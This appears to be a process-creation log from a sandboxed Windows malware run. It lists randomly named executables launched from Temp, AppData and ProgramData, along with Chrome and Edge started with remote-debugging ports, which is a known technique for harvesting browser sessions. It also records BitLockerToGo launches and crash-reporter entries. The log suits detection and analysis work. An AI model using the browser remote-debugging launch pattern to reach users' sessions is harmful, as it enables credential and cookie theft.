"C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2256,i,15713520420903099006,5771375587645475105,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1596,i,15713520420903099006,5771375587645475105,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2316 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1900,i,15713520420903099006,5771375587645475105,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2448 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99db4cc40,0x7ff99db4cc4c,0x7ff99db4cc58
C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe
"C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99d3646f8,0x7ff99d364708,0x7ff99d364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2448 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe
"C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe
"C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99db4cc40,0x7ff99db4cc4c,0x7ff99db4cc58
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2016 -ip 2016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 808
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2400,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2392 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1900,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2436 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1972,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3160,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4540 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4676,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4896 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,7663933257849960815,13405961648069094795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6045276845371632854,11495814118856295916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2932 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\rvhetm\ktgtc.exe
C:\ProgramData\rvhetm\ktgtc.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 960"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe
"C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99d3646f8,0x7ff99d364708,0x7ff99d364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3488 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4872 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99db4cc40,0x7ff99db4cc4c,0x7ff99db4cc58
C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe
"C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2644 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4872 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9011399044491333635,6514709473298848053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3660 /prefetch:2
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe
"C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99d3646f8,0x7ff99d364708,0x7ff99d364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,744869653311441985,16062956415993869617,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99d3646f8,0x7ff99d364708,0x7ff99d364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
